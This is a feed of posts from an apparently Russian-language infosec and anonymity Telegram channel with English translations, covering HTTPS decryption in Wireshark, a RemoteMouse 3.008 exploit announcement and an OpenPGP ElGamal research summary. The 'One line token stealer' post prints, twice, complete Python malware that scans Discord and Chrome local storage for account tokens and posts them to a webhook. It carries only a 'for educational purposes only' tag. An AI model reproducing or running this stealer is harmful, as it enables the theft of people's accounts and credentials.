0% Privacy
6.8K subscribers
1.57K photos
53 videos
542 files
703 links
канал про анонимность, ИБ и бред автора в конвульсиях шизофрении.

The channel is about anonymity, information security and the author's delirium in the convulsions of schizophrenia.
Download Telegram
|Расшифровываем HTTPS-трафик испольуя WireShark|

🤙Шизо на связи!
🔥Сегодня разберём статью про расшифровки(не дешифровки!) HTTPS - трафика посредством Wireshark.
Способы очень простые:
1️⃣Первый способ легко выполняется для Linux(у яблочных потруднее, хотя macos - никсы, но всё-равно, на винде вообще не трудно, там для этого есть гуи - интерфейс) устанавливаем глобальную переменную SSLKEYLOGFILE подробнее расскажу ниже(только для линуха, ибо сердечко отдал именно ему, про остальные можно почитать в статье).
Для тех кто не в теме синтаксис у глобальны переменных такой: export NAME=Value или set NAME=Value
и записывать строку(и) нужно в одном из файлов: ~/.bashrc, ~/.bash_profile, ~/.bash_login, ~/etc/.profile или ~/etc/environment.
Всё очень просто, шизо гарантирует.
Открываем удобным вам редактором файл(нужно будет ввести пасс):
sudo vim ~/.bashrc
Далее добавляем строку с переменной для дальнейшей работы в Wireshark:
export SSLKEYLOGFILE=~/.sslkeyfile
И закрываем файл(конечно, его нужно сохранить), после чего пишем : source ~/.bashrc

После этих операций нужно перезапустить по, HTTPS-трафик которого мы хотим проанализировать и расшифровать.
На выходе после этого должны получить такое:
# SSL/TLS secrets log file, generated by NSS
CLIENT_HANDSHAKE_TRAFFIC_SECRET ваше значение
SERVER_HANDSHAKE_TRAFFIC_SECRET ваше значение
CLIENT_RANDOM ваше значение
CLIENT_TRAFFIC_SECRET_0 ваше значение
SERVER_TRAFFIC_SECRET_0 ваше значение
EXPORTER_SECRET ваше значение

Теперь, переходим в Wireshark и переходим в TLS(Edit -> Preferences -> Protocols -> TLS), затем устанавливаем значение SSLKEYLOGFILE в "(Pre-)Master Secret Log filename" и ставим галочки возле ☑️Reassembe TLS records multiple TCP segments и
☑️Reassembe TLS Application Data spanning multiple TLS records.

2️⃣Второй способ связан со сниффингом.
Для его реализации нужно просто нажать на пкм на пакет TLS, затем нажимаем на Protocol Preferences -> Transport Layer Security -> (Pre-)Master Secret Log filename, затем выпадет сверху менюшка, в которой мы введём путь к файлу, который нужно расшифровать.

⚠️Хочу подвести итоги. Да расшифровать HTTPS - трафик просто, а вот дешифровать намного труднее, ибо TLS будет нам мешать, однако, для анонимов это означает, что трафик из exit-node тоже можно прослушивать не особо заморачиваясь, при условии того, что атакующий будет в системе, в ином случае - придётся заниматься дешифрованием. Также можно таким образом реверсить приватные апишки веб приложений, исследовать уязвимости и что очень важно использовать это для аудита приватности приложения.

#shizo #decrypt #decipher #wireshark #https
👍31
|Decipher HTTPS using WireShark|

🤙The
Shizo is in touch!
🔥 Today we will analyze an article about decipher (not decryption!) HTTPS traffic via Wireshark.
The methods are very simple:
1️⃣ The first method is easily done for Linux(apple is more difficult, although macos - nicks, but still, it's not difficult at all on Windows, there is a GUI interface for this) we set the global variable SSLKEYLOGFILE in more detail below (only for linux, because I gave it to him, you can read about the rest in the article).
For those who are not in the topic, the syntax of global variables is as follows: export NAME=Value or set NAME=Value
and you need to write the string(s) in one of the files: ~/.bashrc, ~/.bash_profile, ~/.bash_login, ~/etc/.profile or ~/etc/environment.
It's very simple, the schizo guarantees.
Open the file with an editor convenient for you (you will need to enter a pass):
sudo vim ~/.bashrc
Next, add a string with a variable for further work in Wireshark:
export SSLKEYLOGFILE=~/.sslkeyfile
And close the file (of course, you need to save it), after which we write : source ~/.bashrc

After these operations, we need to restart the software whose HTTPS traffic we want to analyze and decipher.
At the output after that you should get this:
# SSL/TLS secrets log file, generated by NSS
CLIENT_HANDSHAKE_TRAFFIC_SECRET is your value
SERVER_HANDSHAKE_TRAFFIC_SECRET is your value
CLIENT_RANDOM your value
CLIENT_TRAFFIC_SECRET_0 is your value
SERVER_TRAFFIC_SECRET_0 is your value
EXPORTER_SECRET is your value

Now, go to Wireshark and go to TLS(Edit -> Preferences -> Protocols -> TLS), then set the SSLKEYLOGFILE value to "(Pre-)Master Secret Log filename" and tick the boxes next to ☑️ Reassembe TLS records multiple TCP segments and
☑️ Reassembe TLS Application Data spanning multiple TLS records.

2️⃣ The second method is related to sniffing.
To implement it, you just need to click on the TLS package on the right button click , then click on Protocol Preferences -> Transport Layer Security -> (Pre-)Master Secret Log filename, then a menu will drop down from above, in which we will enter the path to the file to be decipher.

⚠️I want to sum up. Yes, it's easy to decipher HTTPS traffic, but it's much more difficult to decrypt, because TLS will interfere with us, however, for anonymous users, this means that traffic from the exit node can also be listened to without much bother, provided that the attacker is in the system, otherwise you will have to decrypt. You can also reverse engineering the private API of web applications in this way, investigate vulnerabilities and, most importantly, use this to audit the privacy of the application.

#shizo #decrypt #decipher #wireshark #https
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
😉Во-первых, уже 1100 сабов. Спасибо, что читаете шизофреника. Всё-равно как-то не верится.
А во-вторых, мои хорошие, хотелось бы сказать, что продолжайте заниматься тем, к чему лежит душа и не акцентируйте внимание на происходящем вокруг в данный момент. Пусть будет у вас хорошее настроение и чтобы ничего не останавливало на пути.
А также, отлично отдохнуть на выходных.

😉Firstly, there are already 1100 subs. Thank you for reading schizophrenic. I still can't believe it.
And secondly, my good ones, I would like to say that continue to do what the soul is for and do not focus on what is happening around you at the moment. May you be in a good mood and that nothing stops you on the way.
And also, have a great weekend break.
👍114
|AppSec Ezine|

📰428rd Edition
Release Date: 29/04/2022
pathonproject
github

#ezine #appsec #infosec
|RemoteMouse-3.008-Exploit|

🪲exploit-db

🛡Только в образовательных целях
Простенький сплоит, реализованный на питоне для эксплуатации RomoteMouse версии 3.008(нужна для удалённого управления пк посердством телефона или планшета). Для тех, кому интересно, есть статья про написание эксплоита, в которой рассказывается и про реверс приложухи(всё относительно просто). По итогу при удачно атаке мы получаем способ подключения к службе RemoteMouse и можем тыкать на виртуальный кнопочки в машине, а также на ней выполнить вредоносный код( ну, а какой ещё нужен в ходе атаки).
Но, чтобы всё прошло успешно, жертва должна быть авторизована в системе, ибо в странице входа в винду и в UAC не получится ввести что-либо, просто потому что они защищены от ввода с клавиатуры и мышки, которые находятся под контролем по(ситуация с виртуальной клавиатурой - другая).
Видео-демонстрацию прикладываю выше⬆️, а сам сплоит ниже⬇️

🛡For educational purposes only!
A simple exploit implemented on python for RomoteMouse operation version 3.008 (needed for remote PC control by phone or tablet). For those who are interested, there is an article about writing an exploit, which also tells about the reverse engineering of the application (everything is relatively simple). As a result, with a successful attack, we get a way to connect to the RemoteMouse service and can poke buttons on the virtual machine, as well as execute malicious code on it (well, what else is needed during the attack).
But in order for everything to be successful, the victim must be logged in to the system, because it will not be possible to enter anything in the Windows login page and in the UAC, simply because they are protected from keyboard and mouse input, which are under the control of the software (the situation with the virtual keyboard is different).
I attach a video demonstration above ⬆️ , and the exploit itself is below ⬇️

#exploit #poc
👍1
|One line token stealer|

🛡Только в образовательных целях!
🦠Очень маленький стиллер токенов, который умещается в одну строку(на данный момент 842 байта) и написан на питоне.
🔓Поддерживает линух !
Собственно вот и он:
[__import__('threading').Thread(target=lambda:[[[__import__('requests').post('Webhook here!',data={'content':'\n```get stealed :: %s```\n'%x}) for x in list(set(__import__('re').findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', open('%s/%s'%(path,file_name), encoding='utf-8', errors="ignore").read())))] for file_name in __import__('os').listdir(path) if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite")]]).run() for path in ['%s'%(__import__('os').path.join((__import__('os').getenv('APPDATA')) if __import__('os').name == "nt" else (__import__('os').path.expanduser("~")+"/.config/"), endpoint, "Local Storage","leveldb")) for endpoint in ["discord", "discordcanary", "discordptb", "google-chrome/Default", "Google\\Chrome\\User Data\\Default"]] if __import__('os').path.isdir(path)]

🛡For educational purposes only!
🦠A very small token stiller that fits in one line (currently 842 bytes) and is written in python.
🔓Linux support !
Actually here he is:
[__import__('threading').Thread(target=lambda:[[[__import__('requests').post('Webhook here!',data={'content':'\n```get stealed :: %s```\n'%x}) for x in list(set(__import__('re').findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', open('%s/%s'%(path,file_name), encoding='utf-8', errors="ignore").read())))] for file_name in __import__('os').listdir(path) if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite")]]).run() for path in ['%s'%(__import__('os').path.join((__import__('os').getenv('APPDATA')) if __import__('os').name == "nt" else (__import__('os').path.expanduser("~")+"/.config/"), endpoint, "Local Storage","leveldb")) for endpoint in ["discord", "discordcanary", "discordptb", "google-chrome/Default", "Google\\Chrome\\User Data\\Default"]] if __import__('os').path.isdir(path)]

#stealer
👍5
0% Privacy pinned «|Time Attack| Шизо на связи Предисловие. Итак, сижу спокойно, пишу говнокод, читаю скучные работы и много рутины, как вдруг мне приходит сообщение на жабу с вопросом про "атаки по времени" и статью от человека, категорию которых уже описывал: "ананимность"…»
|(Не)безопасность Эль-Гамаля в OpenPGP|

Градус шизофрении у Шизо накаляется.
🔐Интересная работа по криптографии с конференции Real World Cryptography Conference 2022.
В ней разбирается реализация ElGamal в OpenPGP посредством либ Botan(используется в Thunderbird) и Libcrypto++(в простонародье - CryptoPP, github), а также ещё несколько реализаций от GnuPG и Go(используется в мною не любимом protonmail).

По собственному опыту шизофренического использования криптолиб, удобнее показалось взаимодействие с CryptoPP, хотя это субъективно. Для многих, кто просто использует OpenPGP для обмена информации по электронной и почте и не только и не вникали, из чего состоит этот стандарт, криптосистема Эль-Гамаля используется в качестве одной и частей системы шифрования публичных ключей в OpenPGP(можно сказать - главной).
Тут, кстати, можете почитать про предлагаемый стандарт(формат сообщений) RFC 4880.
Вообще, одна из причин порождающих атаки на криптосистему(стандарт) - отсутствие единого стандарта у Эль-Гамаля -> уйма имплементаций протокола. Хотя не безопасность использования является следствием взаимодействия сразу нескольких реализаций.

В результате исследования на основе 800 тысяч открытых ключей Эль-Гамаль, удалось восстановить только 2 тысячи ключей, хотя этой уже тревожный звоночек, честно говоря. Как и убедился со временем - лучше использовать GnuPG, ибо даже на фоне этих событий атака будет много более трудно затратной по сравнению с другими реализациями, ибо ресурсы для атаки нужны очень большие.

Собственно, а в чём же заключается атака?
Она происходит чаще всего из-за наличия разных конфигураций параметров и применений такого вектора атак, как атака по сторонним каналам(side-channels attacks),а также кросс конфигурационная атака , к примеру самыми просторными атаками будут на связку ключ/либа:GnuPG/LibcryptoPP, GnuPG/Go, а самая сильная - x ∈ [1; p-1]/GnuPG. LibcryptoPP(Botan)/LibcryptoPP и LibcryptoPP(Botan)/Go - пока проверяются.

Также стоит отметить, что использование простого числа Шнора с примитивным генератором, тоже уменьшает безопасность криптосистемы. Атака производится путём получения зашифрованных сообщений(текстов) и дальнейшим дешифрованием.
💾Подробнее можно почитать в работе и на скринах, ниже прикладываю презентацию с Real World Crypto 2022⬇️ и работу, которая вышла в 2021 году ⬇️.

обновление: инструмент для проверки уязвим ли клиент OpenPGP CVE-2021-33560

#shizo #cryptography #privacy
🔥1
|(In)security of ElGamal in OpenPGP|

The degree of schizophrenia in the Schizo is heating up.
🔐Interesting work on cryptography from the Real World Cryptography Conference 2022.
It understands the implementation of ElGamal in OpenPGP via lib Botan(used in Thunderbird) and Libcrypto++(in the common people - CryptoPP, github), as well as several other implementations from GPGME( GnuPG )and Go(used in my disliked protonmail).
From my own experience of schizophrenic use of cryptolib, it seemed more convenient to interact with CryptoPP, although this is subjective. For many who simply use OpenPGP to exchange information by e-mail and not only and did not delve into what this standard consists of, the El-Gamal cryptosystem is used as one and parts of the public key encryption system in OpenPGP (we can say the main one).
Here, by the way, you can read about the proposed standard (message format) RFC 4880.
In general, one of the reasons generating attacks on the cryptosystem (standard) is the lack of a single standard for El Gamal -> a lot of protocol implementations. Although not the safety of use is a consequence of the interaction of several implementations at once.
As a result of a study based on 800 thousand public keys of El Gamal, it was possible to recover only 2 thousand keys, although this is already a wake-up call, to be honest. As I became convinced over time, it is better to use GnuPG, because even against the background of these events, the attack will be much more difficult to spend compared to other implementations, because the resources needed for the attack are very large.
Actually, what is the attack?
It occurs most often due to the presence of different configurations of parameters and applications of such an attack vector as an attack on third-party channels (side-channels attacks), as well as a cross-configuration attack, for example, the most spacious attacks will be on the key/lib bundle:GnuPG/LibcryptoPP, GnuPG/Go, and the strongest is x ∈ [1; p-1]/GnuPG. LibcryptoPP(Botan)/LibcryptoPP and LibcryptoPP(Botan)/Go are still being checked.
It is also worth noting that using a Schnor prime number with a primitive generator also reduces the security of the cryptosystem. The attack is carried out by receiving encrypted messages (texts) and further decryption.
💾You can read more in the work and on the screenshots, below I attach a presentation with Real World Crypto 2022 ⬇️ and the work that was released in 2021⬇️.

update: a tool to check whether the OpenPGP client is vulnerable CVE-2021-33560

#shizo #cryptography #privacy
👍1